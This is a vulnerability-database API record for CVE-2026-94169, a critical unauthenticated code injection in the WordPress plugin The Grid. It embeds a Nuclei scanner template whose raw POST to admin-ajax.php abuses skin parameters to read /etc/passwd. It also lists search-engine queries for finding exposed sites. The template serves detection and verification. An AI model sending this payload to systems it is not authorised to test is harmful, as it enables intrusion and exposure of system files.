{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2026-94169/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2026-94169/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2026-94169/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2026-94169/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2026-94169/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2026-94169"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2026-94169"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2026/CVE-2026-94169.yaml",
    "nuclei_template_severity": "critical",
    "nuclei_template_yaml": "id: CVE-2026-94169\n\ninfo:\n  name: The Grid <= 2.8.1 - Unauthenticated Code Injection\n  author: 0x_Akoko\n  severity: critical\n  description: |\n    Theme-one The Grid <= 2.8.1 contains a command injection caused by improper control of code generation, letting attackers execute arbitrary commands remotely, exploit requires crafted input.\n  impact: |\n    Attackers can execute arbitrary commands remotely, potentially leading to full system compromise.\n  remediation: |\n    Update to the latest version beyond 2.8.1.\n  reference:\n    - https://patchstack.com/database/wordpress/plugin/the-grid/vulnerability/wordpress-the-grid-plugin-2-8-1-remote-code-execution-rce-vulnerability\n    - https://github.com/kize7/CVE-2026-94169\n    - https://nvd.nist.gov/vuln/detail/CVE-2026-94169\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\n    cvss-score: 10\n    cve-id: CVE-2026-94169\n    epss-score: 0.04422\n    epss-percentile: 0.91387\n    cwe-id: CWE-94\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: theme-one\n    product: the-grid\n    fofa-query: body=\"/wp-content/plugins/the-grid/\"\n    publicwww-query: \"/wp-content/plugins/the-grid/\"\n  tags: cve,cve2026,wordpress,wp,wp-plugin,the-grid,theme-one,lfi,unauth,vkev\n\nvariables:\n  grid: \"{{rand_text_alpha(8)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        action=the_grid_load_more&grid_nonce=invalid&grid_page=1&grid_name={{grid}}&grid_data[item_number]=1&grid_data[grid_skins][evil][php]=/etc/passwd&grid_data[grid_skins][evil][type]=grid&grid_data[grid_skins][evil][slug]=evil&grid_data[skins]={\"post\":\"evil\"}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 200'\n          - 'contains(content_type, \"json\")'\n          - 'regex(\"root:.*:0:0:\", body)'\n        condition: and\n# digest: 4a0a004730450220152cef0b513b0db945c0b79905858789357bd58df489ee23ee1fbec5f0a9b43e022100aac7e74167e15bd97a28e0dff6b7013ad67e620d0e06094ae7fcf7ca8d900e95:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2026-94169"
}